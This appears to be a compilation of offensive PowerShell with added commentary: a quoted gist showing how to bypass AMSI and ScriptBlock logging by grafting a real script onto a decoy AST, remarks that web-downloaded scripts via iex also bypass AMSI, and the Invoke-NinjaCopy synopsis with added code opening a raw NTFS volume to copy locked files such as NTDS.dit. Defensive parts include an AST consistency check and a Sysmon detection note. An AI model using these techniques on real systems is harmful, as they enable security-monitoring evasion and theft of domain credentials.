```powershell
# Parse a harmless decoy. Its extent is the text that will be reported for the block.
$SpoofedAst  = [ScriptBlock]::Create("Write-Output 'Hello'").Ast
# Parse the script that should actually run.
$ExecutedAst = [ScriptBlock]::Create("Import-Module [SCRIPT PATH]").Ast
# ScriptBlockAst(extent, paramBlock, beginBlock, processBlock, endBlock, dynamicParamBlock):
# the decoy's extent is combined with the real script's EndBlock. Copy() is needed because
# an Ast node can only have one parent.
$Ast = [System.Management.Automation.Language.ScriptBlockAst]::new($SpoofedAst.Extent,
    $null,
    $null,
    $null,
    $ExecutedAst.EndBlock.Copy(),
    $null)
$Sb = $Ast.GetScriptBlock()
# Invoke the constructed scriptblock.
& $Sb
# Any function - such as, in this case, WinPwn - that you want to be executed must already be called
# in the scriptblock on the remote webserver. Fun fact: scripts that are loaded by the script itself
# via iex(new-object net.webclient) also bypass AMSI.
```
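The following is an added example, ours rather than the gist author's, that builds the spoofed block the same way with a harmless payload (`Get-Date`) and then shows the artefact the trick leaves behind: the grafted EndBlock still carries the extent of the script it was parsed from, so its statements are not substrings of the root extent that AMSI and ScriptBlock logging are handed. A hosting application or a logging consumer can use that inconsistency to flag a constructed AST before invoking it. The function names and the containment heuristic are our own.

```powershell
function New-SpoofedScriptBlock {
    param(
        [Parameter(Mandatory)][string]$DecoyText,   # what Ast.Extent (and therefore AMSI) sees
        [Parameter(Mandatory)][string]$RealText     # what actually executes
    )
    $decoy = [ScriptBlock]::Create($DecoyText).Ast
    $real  = [ScriptBlock]::Create($RealText).Ast
    # Same six-argument constructor as the gist:
    # ScriptBlockAst(extent, paramBlock, beginBlock, processBlock, endBlock, dynamicParamBlock)
    $ast = [System.Management.Automation.Language.ScriptBlockAst]::new(
        $decoy.Extent, $null, $null, $null, $real.EndBlock.Copy(), $null)
    $ast.GetScriptBlock()
}

function Test-ScriptBlockAstConsistent {
    # Hypothetical defender-side check (our heuristic, not a PowerShell built-in).
    param([Parameter(Mandatory)][ScriptBlock]$ScriptBlock)
    $root     = $ScriptBlock.Ast
    $rootText = $root.Extent.Text
    # In a normally parsed block every statement's text is a substring of the root
    # extent. A copied EndBlock keeps the extent of its original source text, so
    # the statements it carries fail this containment test.
    $hidden = @(
        $root.FindAll({ param($n) $n -is [System.Management.Automation.Language.StatementAst] }, $true) |
            Where-Object { -not $rootText.Contains($_.Extent.Text) } |
            ForEach-Object { $_.Extent.Text } |
            Select-Object -Unique
    )
    [pscustomobject]@{
        Consistent   = ($hidden.Count -eq 0)
        ReportedText = $rootText   # what logging/AMSI would have been shown
        HiddenText   = $hidden     # statements that run but are absent from ReportedText
    }
}

$sb = New-SpoofedScriptBlock -DecoyText "Write-Output 'Hello'" -RealText 'Get-Date -Format o'
$sb.ToString()                                   # the block only admits to the decoy text
& $sb                                            # yet Get-Date is what executes
Test-ScriptBlockAstConsistent -ScriptBlock $sb   # flags the grafted EndBlock
Test-ScriptBlockAstConsistent -ScriptBlock { Write-Output 'Hello' }   # a genuinely parsed block passes
```

The check is deliberately a substring test on `Extent.Text` rather than a comparison of offsets: extents from two different parses are relative to their own source strings, so offsets alone cannot be compared. It catches the construction shown in the gist; it does not claim to detect every way of assembling an AST by hand.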
```powershell
function Invoke-NinjaCopy
{
<#
.SYNOPSIS

This script can copy files off an NTFS volume by opening a read handle to the entire volume (such as c:) and parsing the NTFS structures. This requires that you
are an administrator of the server. This allows you to bypass the following protections:
    1. Files which are opened by a process and cannot be opened by other processes, such as the NTDS.dit file or SYSTEM registry hives
    2. SACL flag set on a file to alert when the file is opened (I'm not using a Win32 API to open the file, so Windows has no clue)
    3. Bypass DACLs, such as a DACL which only allows SYSTEM to open a file
```
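As an added example (ours, not Invoke-NinjaCopy's own code), here is the first step of the technique the synopsis describes: open the volume device rather than any file, read its NTFS boot sector, and derive where the $MFT lives so a parser can seek to it next. Because the handle is on `\\.\C:` and not on a file object, per-file sharing locks, SACL auditing and file DACLs are never consulted; what the system does enforce is the ACL on the volume device, which is why administrator rights are needed. The function names are hypothetical and the sample boot sector is constructed so the parser can be exercised offline.

```powershell
Add-Type -Namespace Win32 -Name Native -MemberDefinition @'
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern Microsoft.Win32.SafeHandles.SafeFileHandle CreateFileW(
    string lpFileName, uint dwDesiredAccess, uint dwShareMode, IntPtr lpSecurityAttributes,
    uint dwCreationDisposition, uint dwFlagsAndAttributes, IntPtr hTemplateFile);
'@

function Read-VolumeBootSector {
    # Opens \\.\X: directly (administrator required) and returns its first 512 bytes.
    param([Parameter(Mandatory)][ValidatePattern('^[A-Za-z]$')][string]$DriveLetter)
    $GENERIC_READ          = [uint32]2147483648   # 0x80000000
    $FILE_SHARE_READ_WRITE = [uint32]3            # let the OS keep using the volume
    $OPEN_EXISTING         = [uint32]3
    $handle = [Win32.Native]::CreateFileW("\\.\${DriveLetter}:", $GENERIC_READ, $FILE_SHARE_READ_WRITE,
        [IntPtr]::Zero, $OPEN_EXISTING, 0, [IntPtr]::Zero)
    if ($handle.IsInvalid) {
        $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
        throw "CreateFileW(\\.\${DriveLetter}:) failed: $([ComponentModel.Win32Exception]::new($err).Message)"
    }
    $stream = [System.IO.FileStream]::new($handle, [System.IO.FileAccess]::Read)
    try {
        # Device reads must be sector aligned; the boot sector is the first 512 bytes.
        $sector = New-Object byte[] 512
        if ($stream.Read($sector, 0, 512) -ne 512) { throw 'short read of boot sector' }
        Write-Output -NoEnumerate $sector
    } finally { $stream.Dispose() }
}

function ConvertFrom-NtfsBootSector {
    # Parses the NTFS BIOS parameter block into the values a volume parser needs next.
    param([Parameter(Mandatory)][byte[]]$Sector)
    if ($Sector.Length -lt 512) { throw 'boot sector must be 512 bytes' }
    if ([Text.Encoding]::ASCII.GetString($Sector, 3, 4) -ne 'NTFS') { throw 'OEM ID is not NTFS' }
    if ($Sector[0x1FE] -ne 0x55 -or $Sector[0x1FF] -ne 0xAA) { throw 'missing 0x55AA boot signature' }

    $bytesPerSector    = [int][BitConverter]::ToUInt16($Sector, 0x0B)
    $sectorsPerCluster = [int]$Sector[0x0D]
    $totalSectors      = [BitConverter]::ToUInt64($Sector, 0x28)
    $mftLcn            = [BitConverter]::ToUInt64($Sector, 0x30)   # $MFT start cluster
    $mftMirrLcn        = [BitConverter]::ToUInt64($Sector, 0x38)   # $MFTMirr start cluster
    # Clusters per FILE record is a signed byte; a negative value n means 2^(-n) bytes.
    $cpr = [int]$Sector[0x40]; if ($cpr -gt 127) { $cpr -= 256 }
    $clusterBytes = [uint64]($bytesPerSector * $sectorsPerCluster)
    $recordBytes  = if ($cpr -lt 0) { 1 -shl (-$cpr) } else { $cpr * $clusterBytes }

    [pscustomobject]@{
        BytesPerSector    = $bytesPerSector
        SectorsPerCluster = $sectorsPerCluster
        ClusterBytes      = $clusterBytes
        TotalSectors      = $totalSectors
        MftByteOffset     = $mftLcn * $clusterBytes       # where the parser seeks for FILE record 0
        MftMirrByteOffset = $mftMirrLcn * $clusterBytes
        MftRecordBytes    = $recordBytes
    }
}

function New-SampleNtfsBootSector {
    # Constructed test data, not captured from a real disk: 512-byte sectors,
    # 8-sector clusters, $MFT at cluster 786432, 0xF6 (-10) = 1024-byte FILE records.
    $s = New-Object byte[] 512
    [Text.Encoding]::ASCII.GetBytes('NTFS    ').CopyTo($s, 3)
    [BitConverter]::GetBytes([uint16]512).CopyTo($s, 0x0B)
    $s[0x0D] = 8
    [BitConverter]::GetBytes([uint64]104857599).CopyTo($s, 0x28)
    [BitConverter]::GetBytes([uint64]786432).CopyTo($s, 0x30)
    [BitConverter]::GetBytes([uint64]2).CopyTo($s, 0x38)
    $s[0x40] = 0xF6
    $s[0x1FE] = 0x55; $s[0x1FF] = 0xAA
    Write-Output -NoEnumerate $s
}

# Offline: parse the constructed sector.
ConvertFrom-NtfsBootSector -Sector (New-SampleNtfsBootSector) | Format-List
# Live system, as administrator:
# ConvertFrom-NtfsBootSector -Sector (Read-VolumeBootSector -DriveLetter C) | Format-List
```

From `MftByteOffset` a full implementation goes on to read FILE records, follow data runs and reassemble the target file; that is the part of Invoke-NinjaCopy not reproduced here. One caveat for both sides: while no per-file audit fires, the volume open itself is observable. Sysmon Event ID 9 (RawAccessRead) exists precisely to log processes reading a drive through `\\.\` device paths, so this is quiet with respect to file SACLs, not invisible.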